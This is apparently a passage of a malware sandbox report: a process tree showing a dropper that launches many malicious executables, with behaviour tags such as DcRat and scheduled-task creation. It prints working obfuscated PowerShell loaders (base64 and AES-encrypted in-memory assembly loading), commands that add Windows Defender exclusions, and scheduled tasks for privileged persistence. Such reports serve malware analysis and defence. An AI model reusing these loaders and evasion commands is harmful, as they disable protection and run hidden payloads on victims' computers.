- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
PID:5600 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wna2BMXg2p.bat"6⤵PID:5972
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:1936
-
-
C:\Recovery\WindowsRE\RegAsm.exe"C:\Recovery\WindowsRE\RegAsm.exe"7⤵PID:1248
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe"C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe"2⤵
- Executes dropped EXE
PID:5080 -
C:\Users\Admin\AppData\Local\Temp\u3x4.0.exe"C:\Users\Admin\AppData\Local\Temp\u3x4.0.exe"3⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:1428
-
-
C:\Users\Admin\AppData\Local\Temp\u3x4.1.exe"C:\Users\Admin\AppData\Local\Temp\u3x4.1.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4544 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD14⤵PID:496
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe"C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4496 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe3⤵PID:360
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"3⤵PID:288
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f3⤵PID:2488
-
C:\Windows\system32\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f4⤵
- DcRat
- Creates scheduled task(s)
PID:5984
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"3⤵PID:64
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe"C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe"2⤵
- Executes dropped EXE
PID:1556 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "hgfhjjhgj" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe" /rl HIGHEST /f3⤵
- DcRat
- Creates scheduled task(s)
PID:5740
-
-
C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe"C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe"3⤵
- Executes dropped EXE
PID:2152 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "hgfhjjhgj" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe" /rl HIGHEST /f4⤵
- DcRat
- Creates scheduled task(s)
PID:5728
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\crypt.exe"C:\Users\Admin\AppData\Local\Temp\a\crypt.exe"2⤵PID:6016
-
C:\Windows\SysWOW64\wscript.exe"wscript.exe" "C:\Users\Admin\start.vbs"3⤵PID:5180
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "4⤵PID:5348
-
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KDQokZW5jb2RlZEFycmF5ID0gQCgxNTksMjIwLDIzOCwyMzgsMjI0LDIzMiwyMjEsMjMxLDI0NCwxNjksMTkyLDIzMywyMzksMjM3LDI0NCwyMDMsMjM0LDIyOCwyMzMsMjM5LDE2OSwxOTYsMjMzLDI0MSwyMzQsMjMwLDIyNCwxNjMsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjcsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjQsMTgyKQ0KJGRlY29kZWRTdHJpbmcgPSBDb252ZXJ0LUFzY2lpVG9TdHJpbmcgJGVuY29kZWRBcnJheQ0KDQoNCiRmaWxlUGF0aCA9IEpvaW4tUGF0aCAkZW52OlVzZXJQcm9maWxlICJleHBsb3Jlci5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\explorer.ps1' -Encoding UTF8"5⤵PID:5648
-
-
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\explorer.ps1"5⤵PID:4812
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:2744
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Opera_109.0.5097.38_Autoupdate_x64.exe"C:\Users\Admin\AppData\Local\Temp\a\Opera_109.0.5097.38_Autoupdate_x64.exe"2⤵PID:4148
-
-
C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe"2⤵PID:3220
-
-
C:\Users\Admin\AppData\Local\Temp\a\crypted_69a30000.exe"C:\Users\Admin\AppData\Local\Temp\a\crypted_69a30000.exe"2⤵PID:5828
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5696
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4308
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Pgp-Soft.exe"C:\Users\Admin\AppData\Local\Temp\a\Pgp-Soft.exe"2⤵PID:944
-
C:\Users\Admin\AppData\Local\Temp\ckz_Z1NL\nds.exe"C:\Users\Admin\AppData\Local\Temp\ckz_Z1NL\nds.exe"3⤵PID:1356
-
C:\Users\Admin\AppData\Local\Temp\ckz_Z1NL\nds.exe"C:\Users\Admin\AppData\Local\Temp\ckz_Z1NL\nds.exe"4⤵PID:4148
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM nvidia.exe5⤵PID:2732
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM mmi.exe5⤵PID:3664
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM arm.exe5⤵PID:4424
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM mnn.exe5⤵PID:5528
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM mme.exe5⤵PID:5684
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM nnu.exe5⤵PID:3608
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM lss.exe5⤵PID:5208
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM onn.exe5⤵PID:6080
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM u-eng.exe5⤵PID:5972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\temp\java.exe" x -o+ -p8ay73yG6s6gHu8H "C:\Users\Admin\AppData\Local\temp\data6." "C:\ProgramData""5⤵PID:5176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\temp\java.exe x -o+ -p8ay73yG6s6gHu8H C:\Users\Admin\AppData\Local\temp\data5. C:\Users\Admin\AppData\Roaming\\"5⤵PID:5832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\temp\java.exe x -o+ -p8ay73yG6s6gHu8H C:\Users\Admin\AppData\Local\temp\data4. C:\Users\Admin\AppData\Roaming\\"5⤵PID:3136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\temp\java.exe x -o+ -p8ay73yG6s6gHu8H C:\Users\Admin\AppData\Local\temp\data3. C:\Users\Admin\AppData\Local\\"5⤵PID:5368
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c ""%USERPROFILE%\AppData\Roaming\Alexa\Virtual\hostcls.exe"5⤵PID:5604
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C "C:\Windows\explorer.exe "%APPDATA%\Fsdisk\Moderax\svdhost.exe""5⤵PID:6688
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Users\Admin\AppData\Roaming\Chrome\Data01\Ibszab.bat5⤵PID:6696
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Users\Admin\AppData\Roaming\Chrome\Data01\Ibszab.exe5⤵PID:6732
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\ProgramData\Samsung\svdhost.exe5⤵PID:5492
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c ""%USERPROFILE%\AppData\Local\Temp\Googletemp1\wsx.bat"5⤵PID:6152
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill.exe /F /IM nss.exe5⤵PID:6840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "explorer C:\Users\Admin\AppData\Roaming\Chrome\Sharp\Vchtrgchhg.bat"5⤵PID:2276
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\garits.exe"C:\Users\Admin\AppData\Local\Temp\a\garits.exe"2⤵PID:5540
-
-
C:\Users\Admin\AppData\Local\Temp\a\current.exe"C:\Users\Admin\AppData\Local\Temp\a\current.exe"2⤵PID:2124
-
-
C:\Users\Admin\AppData\Local\Temp\a\test.exe"C:\Users\Admin\AppData\Local\Temp\a\test.exe"2⤵PID:3136
-
-
C:\Users\Admin\AppData\Local\Temp\a\123.exe"C:\Users\Admin\AppData\Local\Temp\a\123.exe"2⤵PID:5088
-
-
C:\Users\Admin\AppData\Local\Temp\a\sarra.exe"C:\Users\Admin\AppData\Local\Temp\a\sarra.exe"2⤵PID:268
-
-
C:\Users\Admin\AppData\Local\Temp\a\JSIDBWSJK.exe"C:\Users\Admin\AppData\Local\Temp\a\JSIDBWSJK.exe"2⤵PID:1056
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp98FA.tmp.bat" "3⤵PID:1384
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\tmp98FA.tmp.bat"4⤵PID:764
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\tmp98FA.tmp.bat';$IKhK='MahibHihibHnhibHModhibHulhibHehibH'.Replace('hibH', ''),'GetQgnnCuQgnnrrQgnneQgnnntPQgnnroQgnnceQgnnsQgnnsQgnn'.Replace('Qgnn', ''),'EleVKaqmVKaqeVKaqntVKaqAtVKaq'.Replace('VKaq', ''),'ReaXrSRdLiXrSRnXrSResXrSR'.Replace('XrSR', ''),'DeDwcdcDwcdomDwcdpDwcdreDwcdsDwcdsDwcd'.Replace('Dwcd', ''),'CVrqZreaVrqZtVrqZeVrqZDVrqZecVrqZryVrqZptoVrqZrVrqZ'.Replace('VrqZ', ''),'ChXNvfaXNvfnXNvfgXNvfeEXNvfxteXNvfnsXNvfiXNvfonXNvf'.Replace('XNvf', ''),'SpHdEMlitHdEM'.Replace('HdEM', ''),'EnFMIKtFMIKryFMIKPFMIKoiFMIKntFMIK'.Replace('FMIK', ''),'CCPxDopCPxDyCPxDToCPxD'.Replace('CPxD', ''),'InLeisvLeisokLeiseLeis'.Replace('Leis', ''),'TzEulranzEulszEulfzEulorzEulmzEulFzEulinzEulazEullBzEullozEulckzEul'.Replace('zEul', ''),'LMYvEoMYvEaMYvEdMYvE'.Replace('MYvE', ''),'FrgPovomgPovBgPovagPovsgPove64gPovStgPovrgPovigPovnggPov'.Replace('gPov', '');powershell -w hidden;function Wjvpz($DSMeA){$LRUPP=[System.Security.Cryptography.Aes]::Create();$LRUPP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$LRUPP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$LRUPP.Key=[System.Convert]::($IKhK[13])('hbO8R88HBl6x9E1ChjrqAUcnoAC3B8p99JSIvXSwQuY=');$LRUPP.IV=[System.Convert]::($IKhK[13])('5zVFVvVJKQyl6Cns03Obiw==');$folEv=$LRUPP.($IKhK[5])();$SLWGx=$folEv.($IKhK[11])($DSMeA,0,$DSMeA.Length);$folEv.Dispose();$LRUPP.Dispose();$SLWGx;}function TImJD($DSMeA){$gpnDG=New-Object System.IO.MemoryStream(,$DSMeA);$hLGlZ=New-Object System.IO.MemoryStream;$KsXZc=New-Object System.IO.Compression.GZipStream($gpnDG,[IO.Compression.CompressionMode]::($IKhK[4]));$KsXZc.($IKhK[9])($hLGlZ);$KsXZc.Dispose();$gpnDG.Dispose();$hLGlZ.Dispose();$hLGlZ.ToArray();}$Ewgsd=[System.IO.File]::($IKhK[3])([Console]::Title);$WuYWe=TImJD (Wjvpz ([Convert]::($IKhK[13])([System.Linq.Enumerable]::($IKhK[2])($Ewgsd, 5).Substring(2))));$NZPxf=TImJD (Wjvpz ([Convert]::($IKhK[13])([System.Linq.Enumerable]::($IKhK[2])($Ewgsd, 6).Substring(2))));[System.Reflection.Assembly]::($IKhK[12])([byte[]]$NZPxf).($IKhK[8]).($IKhK[10])($null,$null);[System.Reflection.Assembly]::($IKhK[12])([byte[]]$WuYWe).($IKhK[8]).($IKhK[10])($null,$null); "5⤵PID:5248
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe5⤵PID:168
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵PID:4576
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\tmp98FA.tmp')6⤵PID:6092
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 36344' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network36344Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force6⤵PID:6120
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network36344Man.cmd"6⤵PID:2220
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Locker.exe"C:\Users\Admin\AppData\Local\Temp\a\Locker.exe"2⤵PID:1316
-
-
C:\Users\Admin\AppData\Local\Temp\a\eeee.exe"C:\Users\Admin\AppData\Local\Temp\a\eeee.exe"2⤵PID:1304
-
-
C:\Users\Admin\AppData\Local\Temp\a\inte.exe"C:\Users\Admin\AppData\Local\Temp\a\inte.exe"2⤵PID:2456
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a\inte.exe" & exit3⤵PID:2820
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"2⤵PID:2916
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XClient.exe'3⤵PID:3880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'3⤵PID:3316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\WindowsHealthSystem.exe'3⤵PID:4844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsHealthSystem.exe'3⤵PID:5692
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsHealthSystem" /tr "C:\Users\Admin\AppData\Local\WindowsHealthSystem.exe"3⤵
- DcRat
- Creates scheduled task(s)
PID:6140
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\hghgfhjfhmain.exe"C:\Users\Admin\AppData\Local\Temp\a\hghgfhjfhmain.exe"2⤵PID:592
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "fgfdhdgg" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe" /rl HIGHEST /f3⤵
- DcRat
- Creates scheduled task(s)
PID:3868
-
-
C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe"C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe"3⤵PID:1924
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "fgfdhdgg" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe" /rl HIGHEST /f4⤵
- DcRat
- Creates scheduled task(s)
PID:628
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\a\swiiiii.exe"2⤵PID:4340
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3912
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:6000
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Akh.exe"C:\Users\Admin\AppData\Local\Temp\a\Akh.exe"2⤵PID:5280
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile3⤵PID:3620
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"3⤵PID:5688
-
C:\Users\Admin\Pictures\rnBbem8JoIurL0LltTm8IeTm.exe"C:\Users\Admin\Pictures\rnBbem8JoIurL0LltTm8IeTm.exe"4⤵PID:3440
-
C:\Users\Admin\AppData\Local\Temp\u2nk.0.exe"C:\Users\Admin\AppData\Local\Temp\u2nk.0.exe"5⤵PID:5208
-
-
C:\Users\Admin\AppData\Local\Temp\u2nk.1.exe"C:\Users\Admin\AppData\Local\Temp\u2nk.1.exe"5⤵PID:5176
-
-
-
C:\Users\Admin\Pictures\Y6MWhGSfK7esHIulvSfLYLqJ.exe"C:\Users\Admin\Pictures\Y6MWhGSfK7esHIulvSfLYLqJ.exe"4⤵PID:5340
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:6572
-
-
-
C:\Users\Admin\Pictures\pilzczi4r79yyYgJWGvCKYqy.exe"C:\Users\Admin\Pictures\pilzczi4r79yyYgJWGvCKYqy.exe"4⤵PID:2684
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:6872
-
-
-
C:\Users\Admin\Pictures\VVi70YDdWfts0Xzw7sUSIakU.exe"C:\Users\Admin\Pictures\VVi70YDdWfts0Xzw7sUSIakU.exe"4⤵PID:5528
-
C:\Users\Admin\AppData\Local\Temp\7zS5DD1.tmp\Install.exe.\Install.exe /GuWwdidYfRYv "385118" /S5⤵PID:2460
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵PID:5796
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵PID:6180
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bgNHpsssZstYPMxCCI" /SC once /ST 13:34:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS5DD1.tmp\Install.exe\" mP /odsite_idGKS 385118 /S" /V1 /F6⤵
- DcRat
- Creates scheduled task(s)
PID:7064
-
-
-
-
C:\Users\Admin\Pictures\R0jYbP4AE2MwrZY5WZ0rJdeP.exe"C:\Users\Admin\Pictures\R0jYbP4AE2MwrZY5WZ0rJdeP.exe"4⤵PID:628
-
C:\Users\Admin\AppData\Local\Temp\7zS5FD4.tmp\Install.exe.\Install.exe /GuWwdidYfRYv "385118" /S5⤵PID:3940
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵PID:1020
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵PID:6160
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bgNHpsssZstYPMxCCI" /SC once /ST 13:34:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\brfeMhs.exe\" mP /odsite_idGKS 385118 /S" /V1 /F6⤵
- DcRat
- Creates scheduled task(s)
PID:7080
-
-
-
-
C:\Users\Admin\Pictures\6UX7kX8rb3Hk51wsfjv213Kd.exe"C:\Users\Admin\Pictures\6UX7kX8rb3Hk51wsfjv213Kd.exe" --silent --allusers=04⤵PID:5952
-
C:\Users\Admin\Pictures\6UX7kX8rb3Hk51wsfjv213Kd.exeC:\Users\Admin\Pictures\6UX7kX8rb3Hk51wsfjv213Kd.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2a4,0x2a8,0x2ac,0x2a0,0x2b0,0x6979e1d0,0x6979e1dc,0x6979e1e85⤵PID:3028
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\6UX7kX8rb3Hk51wsfjv213Kd.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\6UX7kX8rb3Hk51wsfjv213Kd.exe" --version5⤵PID:4112
-
-
